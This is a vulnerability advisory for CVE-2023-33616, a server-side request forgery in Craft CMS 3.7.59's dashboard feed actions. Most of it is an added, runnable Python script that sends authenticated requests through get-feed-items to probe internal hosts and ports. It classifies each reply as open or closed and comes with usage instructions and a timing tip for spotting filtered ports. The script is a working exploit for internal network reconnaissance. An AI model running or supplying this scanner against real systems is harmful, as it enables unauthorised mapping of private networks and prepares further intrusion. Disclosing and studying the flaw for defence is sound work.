[CVE-2023-33616] Server-side request forgery (SSRF)
Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services
Vendor of Product: CraftCMS
Affected Product Code Base: 3.7.59
CVE: CVE-2023-33616
Description: Craft CMS 3.7.59 is vulnerable to server-side request forgery (SSRF). The dashboard feed actions fetch a caller-supplied URL from the Craft server, so an authenticated control-panel user can make the server connect to arbitrary internal addresses and infer from the responses which internal hosts, ports and web applications are reachable from it.
Steps to reproduce:
The actions admin/actions/dashboard/get-feed-items and admin/actions/dashboard/save-widget-settings are vulnerable to SSRF. Both take a feed URL from the request and fetch it server-side. Pointing that URL at internal hosts (for example http://127.0.0.1:PORT/ or other RFC 1918 addresses) turns the CMS into a network scanner: a connection error in the response means nothing answered on that port, while a successful fetch, or a parse error on a reply that is not a feed, means an internal service or web application is listening there.
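The scan described above, written out as an added example that is not part of the original advisory and not code from Craft CMS: a small helper that drives the get-feed-items action with internal targets and classifies each reply. The request shape (POST with a CRAFT_CSRF_TOKEN form field and a logged-in control-panel session cookie), the form field name `url`, and the JSON `error` field used to detect a failed outbound connection are assumptions, not facts stated in the advisory; `classify_response()` and `build_probe()` can be checked offline, while `scan()` needs a live target.

```python
"""Added example, not code from the advisory or from Craft CMS: a small
port-discovery helper that drives the get-feed-items action named above.

Assumptions the advisory does not state (labelled as such):
  * the action is reached as POST <base>/admin/actions/dashboard/get-feed-items
    by a logged-in control-panel user, with a CRAFT_CSRF_TOKEN form field;
  * the feed address is sent in a form field named "url" (assumed);
  * fetch failures come back as JSON with an "error" string (assumed).
Only build_probe() and classify_response() are exercised offline; scan()
needs a live target.
"""
from __future__ import annotations

import json
import urllib.error
import urllib.parse
import urllib.request
from dataclasses import dataclass

ACTION_PATH = "/admin/actions/dashboard/get-feed-items"

# Error fragments taken to mean nothing answered on the probed port (assumed
# list; adjust after looking at one real failure response from the target).
CLOSED_MARKERS = ("connection refused", "timed out", "could not resolve",
                  "no route to host", "network is unreachable")


@dataclass(frozen=True)
class Probe:
    host: str
    port: int

    @property
    def target(self) -> str:
        return f"http://{self.host}:{self.port}/"


def build_probe(base_url: str, probe: Probe, csrf_token: str) -> tuple[str, bytes]:
    """Return (request URL, form body) that asks Craft to fetch probe.target."""
    form = {"url": probe.target, "limit": 1, "CRAFT_CSRF_TOKEN": csrf_token}
    return base_url.rstrip("/") + ACTION_PATH, urllib.parse.urlencode(form).encode()


def classify_response(status: int, body: str) -> str:
    """'open' if the CMS reached something on the port, 'closed' if its
    outbound connection failed, 'unknown' if the reply is not interpretable."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return "unknown"
    if not isinstance(data, dict):
        return "unknown"
    if status == 200 and "items" in data:
        return "open"          # a real feed (or something that parsed as one)
    error = str(data.get("error", "")).lower()
    if any(marker in error for marker in CLOSED_MARKERS):
        return "closed"
    if error:
        return "open"          # the server got a reply it could not parse as a feed
    return "unknown"


def scan(base_url: str, session_cookie: str, csrf_token: str,
         host: str, ports: list[int], timeout: float = 15.0) -> dict[int, str]:
    """Probe each port through the CMS and return {port: classification}."""
    headers = {
        "Cookie": session_cookie,
        "Accept": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "Content-Type": "application/x-www-form-urlencoded",
    }
    results: dict[int, str] = {}
    for port in ports:
        url, body = build_probe(base_url, Probe(host, port), csrf_token)
        req = urllib.request.Request(url, data=body, headers=headers, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                results[port] = classify_response(resp.status, resp.read().decode())
        except urllib.error.HTTPError as exc:      # 4xx/5xx replies still carry JSON
            results[port] = classify_response(exc.code, exc.read().decode())
        except urllib.error.URLError:              # could not reach the CMS itself
            results[port] = "unknown"
    return results


if __name__ == "__main__":
    import sys
    # usage: python probe.py https://cms.example.test 'CraftSessionId=...' <csrf> 127.0.0.1 80 443 6379
    base, cookie, csrf, target_host, *port_args = sys.argv[1:]
    for port, verdict in scan(base, cookie, csrf, target_host, [int(p) for p in port_args]).items():
        print(f"{target_host}:{port} {verdict}")
```

Response timing is a second signal worth recording alongside the classification: a port that is filtered rather than closed usually shows up as a long delay followed by a timeout error, which the marker list above reports as closed.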